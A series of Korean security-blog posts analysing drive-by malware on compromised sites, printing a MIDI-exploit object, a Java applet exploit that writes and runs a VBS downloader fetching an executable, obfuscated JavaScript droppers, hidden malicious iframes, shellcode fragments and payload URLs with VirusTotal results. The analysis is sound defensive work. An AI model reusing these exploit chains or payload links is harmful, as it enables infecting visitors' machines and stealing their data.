posted by Kwan's 2012. 2. 25. 19:17

감염 사이트 : http://ad.tiad.co.kr/mt2.html
* 위 사이트는 현재도 감염중에 있습니다! 



메인 사이트 : http://ad.tiad.co.kr/mt2.htm0


Down.html MID 취약점 스크립트 !

<body>

<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">

<param name="fileName" value="test_case.mid">

<param name="SendPlayStateChangeEvents" value="true">

<param NAME="AutoStart" value="True">

<param name="uiMode" value="mini">

<param name="Volume" value="-300">

</object>

</body>

</html>

 


눈의 띄는것은 004.exe 중 Fucknaver.com 이라는게 제일 눈에 띄었다 !

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)  http://fucknaver/    > nul   /c  del    \cmd.exe    }   -   wuapi.exe   stubpath    %SystemRoot%\system32\wuapi.exe onents  ve Setup\Installed Comp \Microsoft\Acti Software    " /f        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\     reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\    \wuapi.exe  Version SOFTWARE\Microsoft\Ole  .exe    http://www.naver.com/    -start start   http://japanddrk/   wininet.dll ADVAPI32.dll    RegSetValueExA  RegCloseKey RegQueryValueExA    InternetOpenA   InternetOpenUrlA    InternetCloseHandle HttpQueryInfoA  RegOpenKeyExA   RegDeleteKeyA   RegCreateKeyA   kernel32.dll    WinExec 

 
Applet.jar

.project , ScriptEngineExp.class , .classpath , MANIFEST.MF 파일이 포함되어 있다 !

그중 ScriptEngineExp.class 속에 !

 ScriptEngineExp.java javax/script/ScriptEngineManagerjs A Bdata C Djava/lang/StringBuilder Pvar error = new Error("My error");this.toString = function(){ java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe /c echo URL = LCase(WScript.Arguments(0))>"%temp%\\happy.vbs"&&cmd.exe /c echo dim m,s>>"%temp%\\happy.vbs"&&cmd.exe /c echo m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P">>"%temp%\\happy.vbs"&&cmd.exe /c echo s="A=D=O=DB=.=S=t=r=e=a=m">>"%temp%\\happy.vbs"&&cmd.exe /c echo set cmd =Createobject(replace(m,"^","")) >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Open "GET",URL,0 >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Send()>>"%temp%\\happy.vbs"&&cmd.exe /c echo FileName=LCase(WScript.Arguments(1))>>"%temp%\\happy.vbs"&&cmd.exe /c echo Set CsCriptGet = Createobject(replace(s,"=",""))>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Mode=^3>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Type=^1>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Open()>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Write(cmd.responseBody)>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.SaveToFile FileName,^2>>"%temp%\\happy.vbs"&&cmd.exe /c cscript "%temp%\\happy.vbs"  E F+ "%temp%\\temp.exe"&& "%temp%\\temp.exe"');return "exploit!";};error.message = this; G H I J Kjavax/swing/JListjava/lang/Objecterror L K M N Ojavax/script/ScriptException P ScriptEngineExpjava/applet/AppletgetEngineByName/(Ljava/lang/String;)
Ljavax/script/ScriptEngine;getParameter&(Ljava/lang/String;)Ljava/lang/String;append-(Ljava/lang/String;)Ljava/lang/StringBuilder;toString()
Ljava/lang/String;javax/script/ScriptEngineeval&(Ljava/lang/String;)Ljava/lang/Object;get([Ljava/lang/Object;)Vadd*(Ljava/awt/Component;)Ljava/awt/Component;printStackTrace

 

댓글을 달아 주세요

posted by Kwan's 2012. 1. 29. 14:59

메인 스크립트중 ! 이상한 스크립트 발견 !

function c102916999516m494180f401f90(m494180f40275f){ var m494180f402f30=16; return (parseInt(m494180f40275f,m494180f402f30));}function m494180f403ed1(m494180f4046a2){ function m494180f405e13(){return 2;} var m494180f404e72='';m494180f406db4=String.fromCharCode;for(m494180f405643=0;m494180f405643<m494180f4046a2.length;m494180f405643+=m494180f405e13()){ m494180f404e72+=(m494180f406db4(c102916999516m494180f401f90(m494180f4046a2.substr(m494180f405643,m494180f405e13()))));}return m494180f404e72;} var z0f='';var m494180f407587='3C7'+z0f+'3637'+z0f+'2697'+z0f+'07'+z0f+'43E696628216D7'+z0f+'
[생략]'
34253638253364253334253337'+z0f+'253330253230253638253635253639253637'+z0f+'2536382537'
+z0f+'34253364253334253334253337'+z0f+'2532302537'+z0f+'332537'+z0f+'342537'+z0f+'3925366
3253635253364253237'+z0f+'2536342536392537'+z0f+'332537'+z0f+'302536632536312537'+z0f+'39
253361253230253665253666253665253635253237'+z0f+'2533652533632532662536392536362537'+z
0f+'3225363125366425363525336527'+z0f+'29293B7'+z0f+'D7'+z0f+'6617'+z0f+'2206D7'+z0f+'
969613D7'+z0f+'47'+z0f+'27'+z0f+'5653B3C2F7'+z0f+'3637'+z0f+'2697'+z0f+'07'+z0f+'43E';
document.write(m494180f403ed1(m494180f407587));

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f[생략]69%67%68%74%3d%31%31%35%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>

if(!myia){document.write(unescape( '<iframe name=c10 src='http://gogo2me.net/.go/check.html?'+Math.round(Math.random()*49335)+'c3d' width=429 height=115 style='display: none'></iframe>'));}var myia=true;

현재 페이지는 !


=========================
Server IP(s):
0.0.0.0
=========================
HTTP headers:

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 29 Jan 2012 05:56:49 GMT
Connection: close
Content-Length: 1245

댓글을 달아 주세요

posted by Kwan's 2011. 7. 27. 18:38

제가 본 한 중국 사이트의 악성 스크립트 입니다 !

<script src='party.css'></script>

IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 !

party.css 볼까요

var hua, hua1, hua2, hua3, hua4;

hua='\x25';    var kao='\x25';   var shit='\x25'; var jj=hua+'u'+'4B5B';  var cao='\x25';
 hua1='u';     kao+='u';    shit+='u';  var kk=hua+'u'+'CD36';  cao+='u';
hua2='58';    kao+='B';    shit+='B';  var ll=hua+'u'+'BD8F';  cao+='B';
 hua3=hua+hua1+'5';    kao+='D';    shit+='D';  var mm=hua+'u'+'E9D0';  cao+='DD';
hua4=hua3+'8'+'58%'+hua1+hua2+hua2; kao+='BC';       shit+='B';shit+='D'; var oo=hua+'u'+'FB7A';  cao+='7';

 var org='u2355%uBDBF%'+'u';
oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+shit+'%';

[중간 코드 생략]

oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u';

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

짧막하게 한번 코드를 간추려서 써보았습니다.

첫번째 빨간색으로 되어있는 코드는 그대로 따라가주면 됩니다 !
여기서
\x25' 는 %25로서 % 을 의미 합니다.

두번째는 var org 로서 되어있는 코드를 모아 봅니다!
이번 스트립트는... var org1 부터 var org12 까지 모아져 있습니다.

그걸 전부 합치면 최종 코드가 짜잔 나옵니다....
이런건 노가다기 때문에 패쓰 합니다...

마지막 코드는

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막이 역시 제일 중요합니다.
최종 파일을 쉽게 나오게 할 수 있는 힌트 입니다.

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막인 코드를 들여다 보면 곧바로 최종파일 바로 받을 수 있습니다.

AHWM라는걸 본다면 쉽게풀수 있습니다.

AHWM%u로 바꿔 줍니다.

%uADB7%u3Dbd3%u8d92%u[중간코드 생략]8c8f%ude93%ucece%ubdbd
이런식으로 접근하게 됩니다.

이와 같이

 


다시 Hex View 로 가서 디코딩을 한번 더 해주면 최종 파일에 접근 할 수 있습니다.

 



이와 같이 멀질라를 이용해서 파악만 하면 쉽게 최종 파일에 접근 할 수 있습니다.

최종 파일 : http://www.jx2xbxxx.com/dxf/021.css

바이러스 토탈 :

http://www.virustotal.com/file-scan/report.html?id=6a179b8d9d3837fa1ecc4b2331959631519e8216f85f1f7ee2e5b844d8d1980a-1311758547

댓글을 달아 주세요

posted by Kwan's 2010. 10. 17. 21:36

최근에는 그냥 window.alert(x) 로 출력 한다면 바로 나오는 출력 코드가 꽤 눈에 띄이고 있다.
뭐 내가 보는게 전부는 아니지만 최근에 alert(x) 출력을 하고도 또 다시 한번더 증가를 시켜주어야 하는 악성코드를 보아서 이렇게 글을 쓴다.

이 악성코드는 2010/10/05 에 나왔으며 지금은 보이지 않는 악성코드이다.

function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-20;j=j+String.fromCharCode(t);}}return j;}window.document.write(a("466C7F7E7E79782A736E4731777978(중략)D4F4397D6D7C737A7E48"));window.location.reload();

중간 코드는 악성코드이기 때문에 생략하였습니다.
보다 싶히 이 악성 코드를 다시 window.alert(x) 를 이용하여서 다시 코드를 출력시켜 본다면 이상한 외계어가 나옵니다. 전 처음에 이게 정상 적인 코드가 아니구나 하고 했는데 이것이 바로 Increase 를 이용해야 제대로 된 코드가 보이는거 였습니다.

2Xkjjed_Z3cededYb_Ya3iYb_Ya1IJOB;3:?IFB7O0DED;42%Xkjjed42iYh_fjbWd]kW][3@WlWIYh_fjZ[\[h4\kdYj_edY`ciqlWhhijh"d1d31\eh_3'1_23i$b[d]j^1_!!q_\_*33&qhijh3k!i$ikXijh_#("(!i$ikXijh_#*"(1d3d!hijh1ssh[jkhdkd(중략)^[qsm_dZem$ijWjki!31sZeYkc[iYh_fj4

출력을 한다면 이렇게 뜨고 있습니다. 겉보기에는 이게 무슨 언어인지 모르겠지만 이걸 다시 인크리스 해보겟습니다~

909090905BDD5C(중략)8BDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDEAEA

이와 같이 나옵니다. 다시 이걸 똑같이 디코드 한다면 최종 파일에 접근 할수 있습니다.

최종 파일 : http://61.1xx.247.31/xxxxxx/upload/vpn/xx/2/wmpub/x.exe

이번 경우는 한 주 유포로 끝났지만 계속 유포 될 가능성이 많으므로 이렇게 올려봅니다.
제가 아는건 이곳까지입니다. :)
이렇게 끝까지 읽어 주셔서 감사합니다.

마지막으로 코드 하나를 더 올리고 마무리를 짓고자 합니다.

^jjf0%%-,$-)$.,$(,%Z%[[$[n[
^jjf0%%,&$'/&$',($(''%c%($[n[
^jjf0%%,&$'/&$',($(''%c%)$[n[
^jjf0%%-,$-)$.,$(,%Z%jb$[n[
^jjf0%%,&$'/&$',($(''%c%cc$[n[
^jjf0%%,&$'/&$',($(''%c%YY$[n[
^jjf0%%-,$-)$.,$(,%Z%Zd$[n[
^jjf0%%-,$-)$.,$(,%Z%))$[n[
^jjf0%%-,$-)$.,$(,%Z%,$[n[
^jjf0%%-,$-)$.,$(,%Z%Wh$[n[

이것은 악성코드 일까요??

댓글을 달아 주세요

  1. 물여우 2010.10.17 22:15 신고  Addr  Edit/Del  Reply

    캬 조금 있으시면 리버싱에도 손대시는 거 아닌가요 ^^
    저는 제가 사용하는 웹 분석기가 중간 단계를 분석하질 못하는 경우가 너무 많아서 분석 포기 중입니다. ㅎㅎ

    • Kwan's 2010.10.17 22:22 신고  Addr  Edit/Del

      리버싱이 너무나도 어려워서요~ㅠ
      더욱 공부해서 해야지요~ 에이 물여우님은 더 고수시면서요~
      쉬우니까 금방 터득하실수있어요 ㅎ
      저도 빨리 배운걸요~ㅎ

posted by Kwan's 2010. 7. 9. 14:34
지금 현재 모 휴대폰 통신사 큐x텔에는 악성 아이프레임이 삽입되어서 연결하고 있는것으로 보인다,.
사이트 내 소스를 보면 금방 악성코드가 삽입되어 있는것을 볼 수가 있다 !!
</script>
</head>
<iframe height=0 width=0 Src= http://110.xx.139.2x1/css/Lib.asp </iframe>
<body style="margin:0" bgcolor="#ffffff">
<script language="JavaScript">flash('/inc/flash/main.swf','936','232','1');</script>

몇주동안 잠잠 하더니 자시 한번 악성코드에 감염된거 같다. 2주만에 다시 그러니 관리자가 뭐하고 있는지. 그래도 스크립트는 오래된것이 아니라 그런지 대부분의 업체에서 전부 진단을 함으로 신고 할 필요가 없을듯 싶다. 최종파일 위치까지 예전이랑 똑같아서 이제는 그럴려니 하고 넘어간다. 그래도 통신사인데 휴대폰 업데이트나 , 정보를 찾아가는 사람들이 백신이 없다면 감염되기 쉽상일꺼 같다. 빨리 관리자 분이 보셔서 삭제하길 희망한다. !!

감염 사이트 : http://www.cuxxtel.com
악성유포지 :  http://110.xx.139.2x1/css/Lib.asp
최종파일 : http://61.1xx.x.93/css/isa.exe

[바이러스 토탈 결과]

검사 파일: lib.asp 전송 시각: 2010.07.09 05:04:15 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.07.09.00 2010.07.08 JS/Downloader
AntiVir 8.2.4.10 2010.07.08 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 JS:Downloader-QJ
Avast5 5.0.332.0 2010.07.08 JS:Downloader-QJ
AVG 9.0.0.836 2010.07.08 Script/Exploit
BitDefender 7.2 2010.07.09 Trojan.Script.407264
CAT-QuickHeal 11.00 2010.07.09 -
ClamAV 0.96.0.3-git 2010.07.08 -
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 -
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.07.09 Trojan.Script.407264
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.07.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.07.08 -
Kaspersky 7.0.0.125 2010.07.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.07.09 -
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5902 2010.07.08 -
NOD32 5263 2010.07.08 probably a variant of JS/TrojanDownloader.Agent
Norman 6.05.11 2010.07.08 -
nProtect 2010-07-08.01 2010.07.08 Script-JS/W32.Agent.WH
Panda 10.0.2.7 2010.07.08 -
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 -
Rising 22.55.04.01 2010.07.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.54.0 2010.07.09 JS/Agent-MZX
Sunbelt 6562 2010.07.09 -
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 -
ViRobot 2010.6.29.3912 2010.07.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 5851 bytes
MD5...: 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1..: e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.07.09 05:04:22 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 5.0.0.31 2010.07.09 Trojan.Peed!IK
AhnLab-V3 2010.07.09.00 2010.07.08 Win-Trojan/Onlinegamehack.55296.G
AntiVir 8.2.4.10 2010.07.08 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.07.08 -
Authentium 5.2.0.5 2010.07.09 -
Avast 4.8.1351.0 2010.07.08 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.08 Win32:Malware-gen
AVG 9.0.0.836 2010.07.08 PSW.Generic8.DOZ
BitDefender 7.2 2010.07.09 Trojan.Generic.KD.18284
CAT-QuickHeal 11.00 2010.07.09 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.07.08 Trojan.Agent-164869
Comodo 5368 2010.07.09 -
DrWeb 5.0.2.03300 2010.07.09 -
eSafe 7.0.17.0 2010.07.08 Win32.TRCrypt.ZPACK
eTrust-Vet 36.1.7693 2010.07.08 -
F-Prot 4.6.1.107 2010.07.08 -
F-Secure 9.0.15370.0 2010.07.09 Trojan.Generic.KD.18284
Fortinet 4.1.133.0 2010.07.08 -
GData 21 2010.07.09 Trojan.Generic.KD.18284
Ikarus T3.1.1.84.0 2010.07.09 Trojan.Peed
Jiangmin 13.0.900 2010.07.08 Trojan/PSW.Magania.anlt
Kaspersky 7.0.0.125 2010.07.09 -
McAfee 5.400.0.1158 2010.07.09 PWS-Mmorpg!pq
McAfee-GW-Edition 2010.1 2010.07.05 Heuristic.LooksLike.Trojan.Crypt.ZPACK.B
Microsoft 1.5902 2010.07.08 PWS:Win32/Magania.gen
NOD32 5263 2010.07.08 -
Norman 6.05.11 2010.07.08 W32/Suspicious_Gen2.BHOYR
nProtect 2010-07-08.01 2010.07.08 Trojan/W32.Agent.55296.IL
Panda 10.0.2.7 2010.07.08 Trj/CI.A
PCTools 7.0.3.5 2010.07.09 -
Prevx 3.0 2010.07.09 High Risk Cloaked Malware
Rising 22.55.04.01 2010.07.09 Trojan.Win32.Generic.521B263B
Sophos 4.54.0 2010.07.09 Sus/UnkPack-C
Sunbelt 6562 2010.07.09 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.07.09 -
TheHacker 6.5.2.1.311 2010.07.08 -
TrendMicro 9.120.0.1004 2010.07.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.07.09 -
VBA32 3.12.12.6 2010.07.08 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.6.29.3912 2010.07.09 Trojan.Win32.PSWMagania.55296.K
VirusBuster 5.0.27.0 2010.07.08 -
 
추가 정보
File size: 55296 bytes
MD5...: a4bd25915a827fe01c44926cc44273fe
SHA1..: 0748e6f3d2a27a5b852737bd40a86d9dcdce06c3
SHA256: d030b52bafbe52bb6e2527e94a325b1e3c996e17eab2789c601179bdb5e9c9ea


[이전글]

[security/악성코드 유포] - http://cpm2.XX66.org:88/Xo/Xi05.htm : JS:CVE-2010-0806-AK
[security/악성코드 유포] - http://gft54577.3xx2.org:6677/x/index.html 변조!!

댓글을 달아 주세요

  1. hoo 2010.07.09 16:41  Addr  Edit/Del  Reply

    줄기차게 나오네요..
    잘보고 갑니다~

    • Kwan's 2010.07.10 17:30 신고  Addr  Edit/Del

      Lib.asp 는 항상 똑같은곳에서 유포하는데 아직까지도 삭제되지않는거 보니 관리자가 손을 놓고 있나봐요~